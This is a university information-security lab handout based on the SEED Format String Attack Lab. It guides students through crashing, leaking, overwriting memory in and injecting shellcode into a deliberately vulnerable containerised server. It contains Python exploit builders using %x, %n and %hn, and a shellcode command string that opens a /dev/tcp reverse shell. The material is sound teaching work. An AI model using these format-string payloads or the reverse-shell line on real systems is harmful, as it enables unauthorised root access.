Lab-4_Format_String_Attack_Lab
Lab-4_Format_String_Attack_Lab
Department of CSE 1
Format String
Information Security | Jan 2024
Overview
The printf() function in C is used to print out a string according to a format. Its first argument
is called format string, which defines how the string should be formatted. Format strings use
placeholders marked by the % character for the printf() function to fill in data during the
printing. The use of format strings is not only limited to the printf() function; many other
functions, such as sprintf(), fprintf(), and scanf(), also use format strings. Some programs allow
users to provide the entire or part of the contents in a format string. If such contents are not
sanitized, malicious users can use this opportunity to get the program to run arbitrary code.
A problem like this is called format string vulnerability.
The objective of this lab is for students to gain first-hand experience on format string
vulnerabilities by putting what they have learned about the vulnerability from class into
actions. Students will be given a program with a format string vulnerability; their task is to
exploit the vulnerability to achieve the following damage: (1) crash the program, (2) read the
internal memory of the program, (3) modify the internal memory of the program, and most
severely, (4) inject and execute malicious code using the victim program’s privilege.
This lab covers the following topics:
• Format string vulnerability, and code injection
• Stack layout
• Shellcode
• Reverse shell
This lab has been tested within the seed labs 20.04 VM. You are to download the
Labsetup.zip file within this VM and perform the tasks here. The Labsetup.zip file can be
found at https://seedsecuritylabs.org/Labs_20.04/Software/Format_String/.
Department of CSE 2
Format String
Information Security | Jan 2024
Environment Setup
Turning of Countermeasure
Modern operating systems use address space randomization to randomize the starting
address of heap and stack. This makes guessing the exact addresses difficult; guessing
addresses is one of the critical steps of the format-string attack. To simplify the tasks in this
lab, we turn off the address randomization.
1. We will be running the docker commands covered in the subsequent steps in the same
terminal window you run the below command:
The above program reads data from the standard input, and then passes the data to
myprintf(), which calls printf() to print out the data. The way how the input data is fed into
the printf() function is unsafe, and it leads to a format-string vulnerability. We will exploit this
vulnerability.
Department of CSE 3
Format String
Information Security | Jan 2024
The program will run on a server with the root privilege, and its standard input will be
redirected to a TCP connection between the server and a remote user. Therefore, the program
actually gets its data from a remote user. If users can exploit this vulnerability, they can cause
damage.
Compilation. We will compile the format program into both 32-bit and 64-bit binaries. Our
pre-built Ubuntu 20.04 VM is a 64-bit VM, but it still supports 32-bit binaries. All we need to
do is to use the -m32 option in the gcc command. For 32-bit compilation, we also use -static
to generate a statically-linked binary, which is self-contained and not depending on any
dynamic library, because the 32-bit dynamic libraries are not installed in our containers.
2. Navigate to the server-code directory and compile the “server.c” program using
make.
Commands:
$ make
$ make install
During the compilation, you will see a warning message. This warning is generated by a
countermeasure implemented by the gcc compiler against format string vulnerabilities. We
can ignore this warning for now.
It should be noted that the program needs to be compiled using the "-z execstack"
option, which allows the stack to be executable. Our ultimate goal is to inject code into the
server program’s stack, and then trigger the code. Non-executable stack is a countermeasure
against stack-based code injection attacks, but it can be defeated using the return-to-libc
technique, which is covered by other SEED labs. In this lab, for simplicity, we disable this
defeat-able countermeasure.
The Server Program. In the server-code folder, you can find a program called server.c. This is
the main entry point of the server. It listens to port 9090. When it receives a TCP connection,
it invokes the format program, and sets the TCP connection as the standard input of the
format program. This way, when format reads data from stdin, it actually reads from the TCP
connection, i.e. the data are provided by the user on the TCP client side. It is not necessary
for students to read the source code of server.c.
Department of CSE 4
Format String
Information Security | Jan 2024
We have added a little bit of randomness in the server program, so different students are
likely to see different values for the memory addresses and frame pointer. The values only
change when the container restarts, so as long as you keep the container running, you will
see the same numbers (the numbers seen by different students are still different). This
randomness is different from the address-randomization countermeasure. Its sole purpose is
to make students’ work a little bit different
3. Before starting your containers, open the docker-compose.yml file and change the
value of the “conatiner_name” field, under the “fmt-server-1” container to your
SRN. This will print your SRN on the terminal along with the output from the server.
4. Move back into the main Labsetup directory and run the command:
$ docker-compose up
The terminal where we run the above command is where all server output will be printed.
Department of CSE 5
Format String
Information Security | Jan 2024
1. Let’s first send a benign message to this server. We will see our message printed out by
the target container.
Command:
$ echo hello | nc 10.9.0.5 9090
Ctrl + c
You need to press CTRL + c after entering your command for the server to respond.
Your task is to provide an input to the server, such that when the server program tries to
print out the user input in the myprintf() function, it will crash. You can tell whether the
format program has crashed or not by looking at the container’s printout. If myprintf()
returns, it will print out "Returned properly" and a few smiley faces. If you don’t see them,
the format program has probably crashed. However, the server program will not crash; the
crashed format program runs in a child process spawned by the server program.
Since most of the format strings constructed in this lab can be quite long, it is better to use a
program to do that.
build_string-T1.py
#!/usr/bin/python3
import sys
s = "%s"*30
print(s)
2. Make the build_string-T1 file executable, run it and pipe the output of the program to our
server at the IP address 10.9.0.5.
Commands:
$ chmod u+x build_string-T1.py
$ ./build_string-T1.py | nc 10.9.0.5 9090
CTRL + C
Take appropriate screenshots and report your observations with appropriate explanations.
Department of CSE 6
Format String
Information Security | Jan 2024
Note: The hexadecimal value of “@” is 40, so as you look through the output displayed by the
server program, look for a sequence of “40404040”s in the stack data printed out. If you do
not see it, adjust the value of 64 in the code until the first four bytes of your input gets
displayed ie. value “40404040” gets displayed.
This value is the distance to the buffer variable ie. input buffer as seen in the server’s output;
that is present in the main function of the format.c program.
build_string-T2A.py
#!/usr/bin/python3
import sys
s = "@@@@"+"%x"*64 # Change this if necessary
print(s)
1. Make the “build_string-T2A” file executable, run it and pipe the output of the
program to our server at the IP address 10.9.0.5.
Commands:
$ chmod u+x build_string-T2A.py
$ ./build_string-T2A.py | nc 10.9.0.5 9090
CTRL + C
Take appropriate screenshots and report your observations with appropriate explanations.
Department of CSE 7
Format String
Information Security | Jan 2024
number = 0xAABBCCDD
content[0:4] = (number).to_bytes(4,byteorder=’little’)
1. In the code replace only the number variable with the value of the secret messages
address, which is displayed on the terminal where the “docker-compose up
command” was run. It will look like the following:
2. Also replace the value of “63” present in the format string of this program with the
value that was found in Task 2A subtracted by one.
build_string-T2B.py
#!/usr/bin/python3
import sys
N = 1500
content = bytearray(0x0 for i in range(N))
fmt = (s).encode('latin-1')
content[8:8+len(fmt)] = fmt
Department of CSE 8
Format String
Information Security | Jan 2024
1. Create a file called “badfile” to store the exploits we will create and then generate the
exploit code. Then send the contents of the badfile to the vulnerable server.
$ touch badfile
$ chmod u+x build_string-T2B.py
$ ./build_string-T2B.py
$ cat badfile | nc 10.9.0.5 9090
Take appropriate screenshots and report your observations with appropriate explanations.
1. In the code replace only the number variable with the value of the target variable’s
address.
2. Replace the value of “63” in this program with the value that was found in Task 2A
subtracted by one.
build_string-T3A.py
Department of CSE 9
Format String
Information Security | Jan 2024
#!/usr/bin/python3
import sys
N = 1500
content = bytearray(0x0 for i in range(N))
number = 0xffffffff
content[0:4] = (number).to_bytes(4,byteorder='little')
s = "%.8x"*63 + "%n"
fmt = (s).encode('latin-1')
content[4:4+len(fmt)] = fmt
1. Delete and recreate the badfile that will store the exploit code.
Commands:
$ rm badfile
$ touch badfile
2. Make the “build_string-T3A.py” an executable and run it to generate the exploit code. Then
send the contents of the badfile to the vulnerable server.
Commands:
$ chmod u+x build_string-T3A.py
$ ./build_string-T3A.py
$ cat badfile | nc 10.9.0.5 9090
This value is equal to the number of characters printed out before the %n format specifier =
4 (4 characters printed for the address value ie. the number variable) + 8 (8 chars for each
%.8x format specifier) * 63.
Take appropriate screenshots and report your observations with appropriate explanations.
Department of CSE 10
Format String
Information Security | Jan 2024
1. In the code replace the number variable with the value of the target variable’s
address.
2. Replace the value of “62” in the program with the value that was found in Task 2A
subtracted by two.
build_string-T3B.py
#!/usr/bin/python3
import sys
N = 1500
content = bytearray(0x0 for i in range(N))
number = 0xffffffff
content[0:4] = (number).to_bytes(4,byteorder='little')
s = "%.8x"*62 + "%.19980x%n"
fmt = (s).encode('latin-1')
content[4:4+len(fmt)] = fmt
The format string will differ if your distance to the buffer variable changes (63 in the case of
all given lab code ).
0x5000 in decimal is equal to 20480. Now we can calculate the value of the precision of the
final %x format specifier so that we can overwrite the data of the target variable as follows:
20480 (decimal value of 0x5000) - 4 (target variable’s address) - 8*62 (8 * distance to input
buffer variable ) = 19980
Which is the value as seen in the code above at the following line:
s = "%.8x"*62 + "%.19980x%n"
Department of CSE 11
Format String
Information Security | Jan 2024
1. Delete and recreate the badfile that will store the exploit code.
Commands:
$ rm badfile
$ touch badfile
2. Make the “build_string-T3B.py” an executable and run it to generate the exploit code. Then
send the contents of the badfile to the vulnerable server.
Commands:
$ chmod u+x build_string-T3B.py
$ ./build_string-T3B.py
$ cat badfile | nc 10.9.0.5 9090
Take appropriate screenshots and report your observations with appropriate explanations.
1. Replace the number1 variable with the value of the target variable’s address +2 and
replace number2 with just the value of the target variable’s address.
2. Replace the value of “62” in the program with the value that was found in Task 2A
subtracted by two.
build_string-T3C.py
#!/usr/bin/python3
import sys
N = 1500
content = bytearray(0x0 for i in range(N))
Department of CSE 12
Format String
Information Security | Jan 2024
fmt = (s).encode('latin-1')
content[12:12+len(fmt)] = fmt
The values written to the variables corresponding to %n are accumulative, i.e., if the first n
gets a value x, and before the second %n, another t characters are printed, the second %n will
get the value x+t. Therefore, let us overwrite the bytes at the first address to 0xaabb first, and
then print out some more characters, so when we reach the second address , the number of
characters printed out can be increased to 0xccdd.
The format string will differ if your distance to the buffer variable changes (63 in the case of
all given lab code ).
0xaabb in decimal is equal to 43707. Now we can calculate the value of the precision of the
first %x format specifier so that we can overwrite the data of the target variable:
Since the values accumulate, we take the difference between the 2 halves of the address
values and that becomes the value of the second format specifier.
1. Delete and recreate the badfile that will store the exploit code.
Commands:
$ rm badfile
$ touch badfile
2. Make the “build_string-T3C.py” an executable and run it to generate the exploit code. Then
send the contents of the badfile to the vulnerable server.
Commands:
$ chmod u+x build_string-T3C.py
$ ./build_string-T3C.py
$ cat badfile | nc 10.9.0.5 9090
Take appropriate screenshots and report your observations with appropriate explanations.
Department of CSE 13
Format String
Information Security | Jan 2024
To succeed in this task, it is essential to understand the stack layout when the printf() function
is invoked inside myprintf(). Figure 1 depicts the stack layout. It should be noted that we
intentionally placed a dummy stack frame between the main and myprintf functions, but it is
not shown in the figure. Before working on this task, students need to answer the following
questions (please include your answers in the lab report):
● Question 1: What are the memory addresses at the locations marked by 2 and 3?
● Question 2: How many %x format specifiers do we need to move the format string
argument pointer to 3? Remember, the argument pointer starts from the location
above 1.
Department of CSE 14
Format String
Information Security | Jan 2024
Figure: Stack layout when printf() is invoked from inside of the myprintf() function.
Shellcode
Shellcode is typically used in code injection attacks. It is basically a piece of code that launches
a shell, and is usually written in assembly languages. In this lab, we only provide the binary
version of a generic shellcode, without explaining how it works, because it is non-trivial. If you
are interested in how exactly shellcode works, and want to write a shellcode from scratch,
you can learn that from a separate SEED lab called Shellcode Lab. Our generic shellcode is
listed in the following (we only list the 32-bit version):
The shellcode runs the "/bin/bash" shell program (Line 1), but it is given two arguments, "-c"
(Line 2) and a command string (Line 3). This indicates that the shell program will run the
commands in the second argument. The * at the end of these strings is only a placeholder,
and it will be replaced by one byte of 0x00 during the execution of the shellcode. Each string
needs to have a zero at the end, but we cannot put zeros in the shellcode. Instead, we put a
placeholder at the end of each string, and then dynamically put a zero in the placeholder
during the execution.
If we want the shellcode to run some other commands, we just need to modify the command
string in Line 3. However, when making changes, we need to make sure not to change the
length of this string, because the starting position of the placeholder for the argv[] array,
which is right after the command string, is hardcoded in the binary portion of the shellcode.
If we change the length, we need to modify the binary part.
To keep the start at the end of this string at the same position, you can add or delete spaces.
Both 32-bit and 64-bit versions of shellcode are included in the exploit.py inside the attack-
code folder.
Department of CSE 15
Format String
Information Security | Jan 2024
Please construct your input, feed it to the server program, and demonstrate that you can
successfully get the server to run your shellcode.
1. Replace the value of the number variable in the code with the address value of the
“frame pointer”. This is displayed on the server every time an input is given.
We will be writing the address of the input buffer to memory and we have to create the format
string for it.
The format string values will differ if the distance to the buffer variable (Found in Task 2A)
changes.
0xffff in decimal is equal to 65535. Now we can calculate the value of the precision of the first
%x format specifier so that we can overwrite the data of the target variable:
We know that the value accumulates when using %hn to write to memory from the previous
task, but what do we do if the value has already reached 0xffff. We utilize the concept of wrap
around. We add 1 to 0xffff so that we end up at 0x0000, following which we just add the
decimal value for the second half of the address. We also add 0x168 to the buffer address so
that we jump to a NOP that is present inside our payload inside the buffer variable.
This value becomes the format specifier to write the second half of the input
exploit.py
#!/usr/bin/python3
import sys
Department of CSE 16
Format String
Information Security | Jan 2024
N = 1500
# Fill the content with NOP's
content = bytearray(0x90 for i in range(N))
###########################################################
number = 0xffffffff+6
content[0:4] = (number).to_bytes(4,byteorder='little')
number = 0xffffffff +4
content[8:12] = (number).to_bytes(4,byteorder='little')
Department of CSE 17
Format String
Information Security | Jan 2024
content[12:12+len(fmt)] = fmt
##########################################################
1. Delete and recreate the badfile that will store the exploit code.
Commands:
$ rm badfile
$ touch badfile
2. Make the “exploit.py” an executable and run it to generate the exploit code. Then send the
contents of the badfile to the vulnerable server.
Commands:
Take appropriate screenshots and report your observations with appropriate explanations.
The format string and the values for the number variables remain the same as in the previous
task. The original code looks like the following:
1. Replace the above line with the following and replace the IP address with the address
of your VM.
" pwd; /bin/sh -i > /dev/tcp/[IP address enp0s3]/7070 0<&1 2>&1 ; *"
Department of CSE 18
Format String
Information Security | Jan 2024
2. Go back to your previous terminal window and delete and recreate the badfile that will
store the exploit code.
Commands:
$ rm badfile
$ touch badfile
2. Make the “exploit.py” an executable and run it to generate the exploit code. Then send the
contents of the badfile to the vulnerable server.
Commands:
$ ./exploit.py
$ cat badfile | nc 10.9.0.5 9090
3. You should observe that you get a reverse connection back in the terminal where you are
running the netcat listener. Here run the following commands before exiting out of the
connection:
Commands:
# whoami
# ifconfig
# exit
Take appropriate screenshots and report your observations with appropriate explanations.
Department of CSE 19
Format String
Information Security | Jan 2024
Remember the warning message generated by the gcc compiler? Please explain what it
means. We will attempt to fix the vulnerability and see if our attacks are successful.
1. Stop the containers and remove the existing format-32, 64 files from both the
server-code directory and fmt-containers directory.
2. In the “format.c” file change the vulnerable “printf()” function to the following to fix the
vulnerability.
3. Rebuild your containers using the “--no-cache” flag and start your containers again.
Commands:
$ docker-compose build --no-cache
$ docker-compose up
Department of CSE 20